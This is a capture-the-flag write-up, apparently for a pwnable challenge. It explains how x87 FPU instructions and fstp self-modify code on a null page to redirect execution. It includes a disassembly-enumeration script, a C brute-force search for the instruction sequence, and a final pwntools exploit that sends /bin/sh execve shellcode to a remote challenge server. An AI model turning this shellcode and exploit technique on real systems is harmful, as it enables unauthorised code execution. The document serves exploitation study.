Rating:

After several attempts, We found that null page allocation is possible on the server.

So, at first, We thought of "push ss; ret", but unfortunately, we cannot push the segment register except fs and gs on x64. (“pushfq; ret” we thought of course, but we couldn't find a way to reduce the rflags to below 0x100.)

After executing 2 bytes of user code, since all the common registers are restored(even then they check rsp using “cmp rsp, rax”), we though about how to utilize special registers sush as st0, mm0, xmm0.

```python
from capstone import *

d = [0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90]

result = []
md = Cs(CS_ARCH_X86, CS_MODE_64)

for ii in range(0,256):
for jj in range(0,256):
CODE = bytes([jj,ii]) + bytes(d)

for (address, size, mnemonic, op_str) in md.disasm_lite(CODE, 0 + 0x200):
if mnemonic == "nop":
break

r = "%s %s" %(mnemonic, op_str)

result.append(r)
result = list(set(result))
result = sorted(result)

f = open("asm_list.txt","w")
f.write("\n".join(result))
f.close()
```

We tried to list all possible assemblies using captone disassembler, and We saw some interesting assemblies.

```
fld1 # set st0 1.00
fadd dword ptr [rdx - 0x70] # dword ptr [rdx - 0x70] always 0x41414141
fsub dword ptr [rdx - 0x70]
fmul st(0), st(0)
fstp xword ptr [rdx] # xword = tbyte
```

Because rdx and rip have the same value, It is possible to modify the code to be executed next with fstp!

Nevertheless, it is difficult to find a combination that sets the desired value for st0. However, as mentioned earlier, since null page allocation is possible, we only need to make the code "push (small value); retn" as a result of self-modified.

Since it is difficult to use x64 inline assembly in Visual Studio, We have written code to find the required combination with x86 inline assembly. (It's a bit different, but it's actually doing the same thing.)

```c
#include <stdio.h>
#include <time.h>
#include <windows.h>

BYTE out_buf[0x100]{};

__declspec(naked) void __stdcall fpu_start()
{
__asm
{
fninit
fld1
ret
}
}

__declspec(naked) void __stdcall fpu_add_reg()
{
__asm
{
push 0x41414141
FADD DWORD PTR[ESP]
pop eax
ret
}
}
__declspec(naked) void __stdcall fpu_sub_reg()
{
__asm
{
push 0x41414141
FSUB DWORD PTR[ESP]
pop eax
ret
}
}
__declspec(naked) void __stdcall fpu_mul_self()
{
__asm
{
fmul st(0), st(0)
ret
}
}

int main()
{
int cases[0x100]{};
srand(time(0));
for(int k=0;k<100000;k++)
{
fpu_start();

for (int i = 0; i < 15; i++)
{
int rnd = rand() % 10;

cases[i] = rnd;

switch (rnd)
{
case 0 :
case 1:
case 2:
case 3:
case 4:
fpu_add_reg();
break;
case 5:
case 6:
case 7:
case 8:
fpu_mul_self();
break;
case 9 :
fpu_sub_reg();
break;
}
}

__asm
{
mov eax, offset[out_buf]
FSTP TBYTE PTR[eax]
}

if (out_buf[2] == 0x6a)
{
if (out_buf[4] == 0xc3 ) //|| out_buf[4] == 0xc2
{
printf("[");
printf("\"\\xd9\\xe8\", "); //fld1

for (int i = 0; i < 15; i++)
{
if (cases[i] >= 0 && cases[i] <= 4)
printf("\"\\xd8\\x42\", ");
else if (cases[i] >= 5 && cases[i] <= 8)
printf("\"\\xdc\\xc8\", ");
else
printf("\"\\xd8\\x62\", ");
}
//fstp tbyte ptr ds:[rdx], st0
printf("\"\\xdb\\x3a\" ");

printf("]");

printf("\n");
}
}

}

}
```

The result is ["\xd9\xe8", "\xd8\x42", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xdc\xc8", "\xd8\x62", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xdb\x3a"].

Final exploit Code:

```python
#-*- coding: utf-8 -*-
from pwn import *
from ctypes import *

lib = CDLL("/lib/x86_64-linux-gnu/libc.so.6")
lib.setlocale(0,"en_US.UTF-8")

p = remote("pwnable.org",31323)
#p = process("./original")

go = lambda x: p.sendlineafter("?\n",x)

def decode(array) :
ptr = create_string_buffer(len(array)*4)
lib.mbstowcs(ptr,array,len(array)*4)
return ptr.value

def encode(array) :
ptr = create_string_buffer(len(array)*4)
lib.wcstombs(ptr,array,len(array)*4)
return ptr.value

while True:
go("?")
p.recvuntil("mmap() at @")
allocated_addr = p.recvuntil("\n")
allocated_addr = allocated_addr.strip()
print(allocated_addr)
if allocated_addr.find("(nil)") > -1 or allocated_addr == "0x0":
break

my_shellcode = "\x6A\x00\x5A\x6A\x00\x5E\x6A\x00\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\x6A\x3B\x58\x0F\x05"

shellcode = my_shellcode + "A"*(111-len(my_shellcode))

gadgets = ["\xd9\xe8", "\xd8\x42", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xdc\xc8", "\xd8\x62", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xd8\x42", "\xdc\xc8", "\xd8\x42", "\xd8\x42", "\xdb\x3a"] #\xeb \xfb

for i, gadget in enumerate(gadgets):
print(i)
assert len(gadget) <= 2
go("?")
pay = "A"*0x5E + "\x52\x58\x52\x5B\x52\x59\x52\x5E\x52\x5F"*(5) + "\x54" + shellcode + "C"*(256) + gadget
p.send(encode(pay)[:-2])
p.interactive()
```